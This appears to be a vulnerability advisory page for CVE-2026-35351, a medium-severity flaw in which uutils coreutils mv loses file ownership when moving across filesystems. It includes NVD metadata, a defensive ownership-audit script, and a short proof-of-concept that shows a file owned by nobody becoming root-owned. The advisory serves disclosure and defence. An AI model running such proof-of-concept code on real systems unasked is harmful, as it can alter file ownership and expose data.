Security Vulnerability Report
CVE-2026-35351 CVSS 4.2 MEDIUM

CVE-2026-35351

Published: 2026-04-22 17:16:37
Last Modified: 2026-04-27 12:28:10

Description

The mv utility in uutils coreutils fails to preserve file ownership during moves across different filesystem boundaries. The utility falls back to a copy-and-delete routine that creates the destination file using the caller's UID/GID rather than the source's metadata. This flaw breaks backups and migrations, causing files moved by a privileged user (e.g., root) to become root-owned unexpectedly, which can lead to information disclosure or restricted access for the intended owners.
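
One way to catch this after a migration, as an added example that is not part of the advisory or of uutils: record ownership before the move, then compare it at the destination. The function names are hypothetical, and the script assumes Linux with a `stat` that accepts `-c`.

```bash
#!/bin/bash
# Added example, not code from the advisory or from uutils.
# Assumes Linux and a stat(1) that accepts -c (GNU, uutils, busybox).

# crosses_fs SRC DST_DIR: true when the two paths are on different devices,
# which is when mv cannot rename(2) and falls back to copy-and-delete.
crosses_fs() {
    [ "$(stat -c %d "$1")" != "$(stat -c %d "$2")" ]
}

# snapshot_owners DIR: print "uid:gid ./relative/path" for everything under
# DIR. Run before the move and keep the output as the manifest.
# Limitation: file names containing newlines are not supported.
snapshot_owners() (
    cd "$1" && find . -exec stat -c '%u:%g %n' {} +
)

# audit_owners MANIFEST DST_DIR: compare each manifest entry with the same
# relative path under DST_DIR; print every difference, return 1 if any.
audit_owners() (
    bad=0
    while read -r want path; do
        if ! have=$(stat -c '%u:%g' "$2/$path" 2>/dev/null); then
            echo "MISSING $path (expected $want)"; bad=1
        elif [ "$have" != "$want" ]; then
            echo "CHANGED $path expected $want found $have"; bad=1
        fi
    done < "$1"
    exit "$bad"
)

# Demo on a constructed tree: ./audit.sh demo
if [ "${1:-}" = "demo" ]; then
    src=$(mktemp -d) dst=$(mktemp -d) manifest=$(mktemp)
    mkdir "$src/home" && echo data > "$src/home/report.txt"
    snapshot_owners "$src" > "$manifest"
    crosses_fs "$src" "$dst" && echo "move would use copy-and-delete"
    cp -R "$src/." "$dst/"          # stand-in for the migration step
    audit_owners "$manifest" "$dst" && echo "ownership preserved"
    rm -rf "$src" "$dst" "$manifest"
fi
```

Each `CHANGED` line names a path whose `uid:gid` no longer matches the manifest, which is the value to pass to `chown` when repairing the destination.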

CVSS Details

CVSS Score: 4.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils (for the specific affected versions, see GitHub Issue #9714)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-35351: uutils coreutils mv ownership preservation issue
# Scenario: Moving a file from one filesystem to another using uutils mv
# Run as root, with ./uutils-mv being the uutils build of mv.
#
# Setup: Create two directories on different filesystems (simulated)
# Note: mv only takes the copy-and-delete path when rename() fails, so
# $DST_FS must be on a different filesystem than $SRC_FS for the result
# below to appear; two plain directories under /tmp share one filesystem.
SRC_FS="/tmp/source_fs"
DST_FS="/tmp/dest_fs"
mkdir -p "$SRC_FS" "$DST_FS"
# Let the unprivileged user create files in the source directory
chown nobody "$SRC_FS"
#
# Create test file as a non-root user (e.g., user 'nobody')
sudo -u nobody touch "$SRC_FS/testfile.txt"
echo "[+] Original file ownership:"
ls -l "$SRC_FS/testfile.txt"
#
# Execute the move as root across filesystem boundaries
# This mimics an admin moving data, triggering the vulnerable copy-and-delete path
./uutils-mv "$SRC_FS/testfile.txt" "$DST_FS/testfile.txt"
echo "[+] File ownership after move:"
ls -l "$DST_FS/testfile.txt"
#
# Expected Vulnerable Result: The file is now owned by root, not nobody
# Expected Correct Result: The file should still be owned by nobody

References

https://github.com/uutils/coreutils/issues/9714 (Exploit, Issue Tracking, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35351", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:37.457", "lastModified": "2026-04-27T12:28:10.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mv utility in uutils coreutils fails to preserve file ownership during moves across different filesystem boundaries. The utility falls back to a copy-and-delete routine that creates the destination file using the caller's UID/GID rather than the source's metadata. This flaw breaks backups and migrations, causing files moved by a privileged user (e.g., root) to become root-owned unexpectedly, which can lead to information disclosure or restricted access for the intended owners."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-281"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/9714", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/uutils/coreutils/issues/9714", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}